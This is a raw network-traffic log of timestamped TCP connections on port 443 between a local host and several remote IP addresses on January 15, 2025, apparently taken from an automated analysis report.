                                                                                                                                            Jan 15, 2025 19:14:34.053657055 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.064682007 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.064858913 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.064924002 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.064944983 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065036058 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065090895 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.065104008 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065187931 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065237045 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.065251112 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065340996 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065406084 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.065418959 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065654993 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.065701962 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.065715075 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.072048903 CET44349744104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.072128057 CET44349744104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.072226048 CET44349744104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.072299957 CET49744443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.072299957 CET49744443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.072761059 CET49744443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.072799921 CET44349744104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.073057890 CET49758443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.073107004 CET44349758104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.073178053 CET49758443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.073514938 CET49758443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.073539019 CET44349758104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.087634087 CET44349745104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.087697983 CET44349745104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.087754965 CET49745443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.087770939 CET44349745104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.087821007 CET49745443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.088423967 CET49745443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.088459015 CET44349745104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.088685036 CET49759443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.088716984 CET44349759104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.088772058 CET49759443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.089051008 CET49759443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.089066982 CET44349759104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.095326900 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.105343103 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.105348110 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.105355978 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119132996 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119231939 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119251013 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119292974 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.119307041 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119366884 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.119751930 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119940996 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.119995117 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.120007992 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120517015 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120543003 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120567083 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120589972 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.120594025 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120603085 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.120610952 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.120642900 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.121169090 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.121371031 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.121395111 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.121417046 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.121429920 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.121476889 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.122132063 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.122308016 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.122334957 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.122349977 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.122361898 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.122406006 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.122417927 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.125119925 CET49761443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:14:34.125147104 CET44349761142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.125211954 CET49761443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:14:34.125261068 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.125303030 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.125312090 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.125324965 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.125380039 CET49761443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:14:34.125385046 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.125395060 CET44349761142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.139524937 CET44349746104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.139614105 CET44349746104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.139687061 CET49746443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.140443087 CET49746443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.140502930 CET44349746104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.140669107 CET49762443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.140717030 CET44349762104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.140786886 CET49762443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.141094923 CET49762443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.141129017 CET44349762104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.153312922 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.167535067 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.167705059 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.167769909 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.167799950 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.168097973 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.168148994 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.168162107 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.168256044 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.168318987 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.168332100 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.168989897 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169059992 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.169074059 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169161081 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169226885 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.169239998 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169323921 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169382095 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.169394970 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169858932 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.169914007 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.169926882 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170063972 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170110941 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.170125008 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170165062 CET44349747104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170260906 CET44349747104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170312881 CET49747443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.170717955 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170772076 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.170783043 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170898914 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170943975 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.170955896 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.170977116 CET49747443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.171000957 CET44349747104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.171261072 CET49763443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.171289921 CET44349763104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.171351910 CET49763443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.171708107 CET49763443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.171731949 CET44349763104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.194864035 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.194937944 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.194951057 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206604004 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206654072 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206707001 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.206720114 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206798077 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206825018 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206840038 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.206854105 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.206904888 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.207153082 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207212925 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.207277060 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207336903 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.207348108 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207629919 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207663059 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207684994 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.207696915 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.207722902 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208242893 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208276987 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208300114 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208311081 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208329916 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208336115 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208345890 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208359003 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208369970 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208400965 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.208426952 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208450079 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208736897 CET49740443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.208765030 CET44349740104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.209076881 CET49765443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.209122896 CET44349765104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.209188938 CET49765443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.209754944 CET49765443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.209781885 CET44349765104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.211364031 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.211602926 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.211622000 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.212748051 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.213043928 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.213176966 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.213184118 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.213217974 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.234776974 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.234894037 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.234944105 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.235017061 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235115051 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235162020 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.235178947 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235518932 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235584974 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.235598087 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235850096 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.235893965 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.235904932 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.239398956 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.239465952 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.239479065 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.248420954 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.255979061 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256136894 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256203890 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.256234884 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256278992 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256325960 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.256462097 CET49742443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.256490946 CET44349742104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256774902 CET49766443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.256830931 CET44349766104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.256906033 CET49766443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.257251978 CET49766443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.257282019 CET44349766104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.264302969 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.279299974 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.279335976 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.321572065 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.321660995 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.321662903 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.321691990 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.321733952 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.321870089 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322196960 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322246075 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.322257996 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322348118 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322402954 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.322412968 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322499037 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.322540045 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.322550058 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323095083 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323162079 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.323173046 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323259115 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323309898 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.323333979 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323431015 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323476076 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.323487043 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323832989 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323894024 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.323904991 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.323992014 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.324037075 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.324047089 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.324141026 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.324184895 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.324194908 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.324346066 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.324404955 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.324568033 CET49748443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.324587107 CET44349748104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.325000048 CET49767443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.325087070 CET44349767104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.325150967 CET49767443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.325423002 CET49767443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.325460911 CET44349767104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.366863966 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.366986036 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367042065 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.367057085 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367175102 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367233038 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.367243052 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367311001 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367377996 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.367552996 CET49749443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.367564917 CET44349749104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.367917061 CET49768443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.367947102 CET44349768104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.368030071 CET49768443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.368422031 CET49768443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.368451118 CET44349768104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.457529068 CET44349753104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.457901001 CET49753443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.457935095 CET44349753104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.459130049 CET44349753104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.459563017 CET49753443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.459686041 CET49753443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.459712982 CET44349753104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.459774017 CET44349753104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.482754946 CET44349751146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.482992887 CET49751443192.168.2.16146.75.120.157
                                                                                                                                            Jan 15, 2025 19:14:34.483007908 CET44349751146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.483637094 CET44349754104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.483858109 CET49754443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.483865023 CET44349754104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.484328985 CET44349754104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.484498024 CET44349751146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.484558105 CET49751443192.168.2.16146.75.120.157
                                                                                                                                            Jan 15, 2025 19:14:34.484687090 CET49754443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.484770060 CET44349754104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.484962940 CET49751443192.168.2.16146.75.120.157
                                                                                                                                            Jan 15, 2025 19:14:34.485038996 CET44349751146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.485140085 CET49754443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:34.485188961 CET49751443192.168.2.16146.75.120.157
                                                                                                                                            Jan 15, 2025 19:14:34.485196114 CET44349751146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.501394033 CET49753443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:34.515831947 CET44349752146.75.120.157192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.516047001 CET49752443192.168.2.16146.75.120.157
                                                                                                                                            Jan 15, 2025 19:14:34.516078949 CET44349752146.75.120.157192.168.2.16
